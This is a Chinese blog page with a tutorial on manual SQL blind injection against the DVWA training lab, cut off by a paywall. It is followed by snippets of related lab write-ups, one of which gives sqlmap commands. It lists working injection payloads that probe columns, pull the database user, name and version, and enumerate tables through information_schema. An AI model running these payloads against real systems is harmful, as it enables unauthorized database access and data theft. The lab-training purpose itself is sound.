WEB手动漏洞挖掘-SQL盲注(DVWA实战)

最新推荐文章于 2025-06-15 18:42:16 发布
原创 最新推荐文章于 2025-06-15 18:42:16 发布 · 6.6k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透 #漏洞 #web #数据库 #select

本文通过DVWA实战,详细介绍了WEB渗透中SQL盲注的原理和方法。首先从基础的SQL盲注开始,如利用'1=1'的条件获取正确结果。接着讲解了模糊匹配技巧,并使用Burp Suite辅助进行反复尝试,通过返回信息判断数据库内容。通过ASCII码计算,逐步揭示字符串。最后,对比不同安全级别页面的响应差异,突出盲注的特点。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这里写图片描述
这里写图片描述
select * from table_name where id = ’ 1’ and 1=1– ’
这里写图片描述
在盲注里至少要有一个正确的结果;否则不显示;
这里写图片描述
这里写图片描述
这里写图片描述

1'order by 5--+
1'order by 3--+

1'union select 1,2--+
1'union select null,CONCAT_WS(CHAR(32,58.32),user(),database(),version())--+
1'and 1=0 union select null,table_name from information_schema,table#
1'and 1=0 union select null,table_name from information_schema,columns where table_name='user'#

这里写图片描述
这里写图片描述

猜列明: 1'and column not null</
最低0.47元/天 解锁文章

200万优质内容无限畅学
DVWA靶场】Web安全之(布尔值/延时型)SQL(超详细教程)
weixin_60838266的博客
07-25 1722
SQL入是一种常见的网络安全漏洞,通过利用网站对用户输入数据的不完善检查和过滤,攻击者可以向数据库服务器发送恶意的SQL查询,从而获取敏感信息或者对数据库进行破坏。在本文中,通过Kali Linux对DVWASQL Injection模块展开了实验,并使用手工和burpsuite工具针对Low、Medium和High等级进行了布尔值/延时型的SQL测试
DVWA通关--SQL(SQL Injection(Blind))
箭雨镜屋
07-11 3943
LOW 通关步骤 代码分析 MEDIUM 通关步骤 代码分析 HIGH 通关步骤 代码分析 IMPOSSIBLE 代码分析
DVWA-SQL脚本(全)
10-04
DVWA SQL,Low,Medium,High 三个级别的bool脚本,比较完整,配套解释 : https://blog.youkuaiyun.com/csdn_Pade/article/details/82886765
SQL入之SQL(非常详细),零基础入门到精通,看这一篇就够了
weixin_51725318的博客
12-16 2050
SQL入之SQL(非常详细),零基础入门到精通,看这一篇就够了
DVWA系列】——SQL入——low详细教程
最新发布
2402_84408069的博客
06-15 1275
摘要:本文针对DVWA中Low安全级别的SQL漏洞进行详细分析。该级别因用户输入直接拼接SQL语句且无过滤,导致可通过单引号闭合进行入攻击。文章演示了从探测入点到获取数据库信息、表名、字段名及用户凭证的完整流程,并提供了防御建议,如使用预处理语句和输入过滤。同时对比了不同安全级别的防护措施,强调预处理语句是根治方案。本教程仅用于教育目的,实际渗透需授权进行。
DVWASQL入(
天空之蓝的博客
11-17 4657
SQL Injection(Blind),即SQL,与一般入的区别在于,一般的入攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知,因此的难度要比一般入高。目前网络上现存的SQL漏洞大多是SQL。手工的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
SQL
周无争的博客
09-26 360
本文翻译自:https://portswigger.net/web-security/sql-injection/blind 在这一部分,我们将描述什么是目的SQL入,解释各种发现和利用目的SQL漏洞的技术。 什么是SQL? 当应用程序易受SQL入攻击,但其HTTP响应不包含相关SQL查询的结果或任何数据库错误的详细信息时,就会出现SQL。 由于存在SQL漏洞,许多技术(如联合)并不有效,因为它们依赖于能够在应用程序的响应中看到入查询的结果。仍然有可能利用SQL入来访问未经
E063-web安全应用-SQL初级.pdf
12-02
SQLSQL Blind Injection)是一种针对Web应用程序的安全漏洞利用方法,它发生在Web应用程序对用户输入的数据没有进行有效的验证和过滤时。在这种情况下,攻击者可以通过构造特定的查询字符串,尝试猜测数据库的...
Sql
qq_40077103的博客
09-17 1789
就是sql语句入后并且成功执行,但是执行的结果不能返回前端,所以需要通过一些其他信息间接推断数据。 分为三类 一、基于布尔的 基于布尔的使用逻辑判断推测获取的数据,通过给定条件,服务器返回真或假使用二分法或者正则表达式等方法缩小判断的范围。 通常会使用sql中的截取字符串函数,以下是一些常见的函数 mid(column_name,start[,length])  #co...
SQL
weixin_59872639的博客
02-18 2614
SQL入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为。 在中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。一般情况下,可分为两类: 基于布尔的(Boolean based) 基于时间的(Time based) 基于布尔的 某些场合下,页面返回的结果只有两种(正常或错误) 。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些S
sql
weixin_55710577的博客
04-09 7622
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 sql--前言一、什么是二、步骤示例1.测试入点2.测所在数据库长度3. 利用ASCII码猜当前数据库名4.利用ASCII码查询表名5、利用ASCII码查询字段名sql所用到的函数总结sqlmap进行sql 前言 靶场环境:sqli-labs-master 第8关 入攻击的本质:把用户的输入当作代码执行。 其中存在两个关键条件: (1)用户可以控制输入。 (2)用户的输入被拼接到原代码上被执行。 提示:以下是本篇.
SQL()
a12332251的博客
12-07 1054
SQL
dvwa为例学习简单sql布尔的详细脚本
Lethe's Blog
03-02 2734
0x01 前置知识 1.SQL入与SQL SQL入: 执行SQL入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 一般在页面上直接就会显示执行sql语句的结果 SQL: 一般情况,执行SQL,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的) 一般在页面上不会直接显示sql执行的结果 ...
SQL(布尔
Dug123456_的博客
04-07 3140
flag有固定的格式,以右花括号结束,假设flag有小写英文字母、下划线、花括号构成,由于不知道flag长度,要一个无限循环,定义计数符j,内嵌循环i遍历小写、下划线和花括号,匹配到字符后j++,出循环的条件是当前i是右花括号,即flag结束。再大循环i次(遍历所有表),内嵌循环j次(表名的所有字符),i是表下标-1,j是字符下标,再内嵌循环k从a到z(假设表名全是小写英文字符)尝试获取每个表的表名。1 and length(database())=4 //判断数据库名字的长度是否为4。
SQL入之
胖虎的博客
11-15 1961
sql入之布尔类型的,结合burpsuite工具实现半自动化
sql入之
2301_80913334的博客
04-15 2375
sql入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为。简单来说就是页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实现sql入。web页面只返回True,False两种值。利用页面返回不同,逐个猜解数据1、布尔不推荐使用手但也需要了解其payload的构造;
python的sqldvwa
09-23
Python的SQL是指通过构造特定的SQL语句来绕过应用程序的安全机制,并获取未经授权的数据。在DVWA漏洞测试环境中进行SQL,可以使用sqlmap工具。下面是使用sqlmap进行DVWASQL的步骤: 1. 首先,确保你已经安装了sqlmap工具并配置好环境。 2. 使用命令行进入到sqlmap工具所在的目录。 3. 输入以下命令,获取数据库dvwa的所有表: ``` python sqlmap.py -u "http://192.168.101.66/bachang/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low;PHPSESSID=n2nqkt6qqt524ehqmae57srcu6" --tables -D dvwa ``` 4. 输入以下命令,获取数据库表users的所有列: ``` python sqlmap.py -u "http://192.168.101.66/bachang/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low;PHPSESSID=n2nqkt6qqt524ehqmae57srcu6" --columns -D dvwa -T users ``` 通过以上步骤,你可以使用sqlmap工具进行DVWASQL,获取数据库表和列的信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值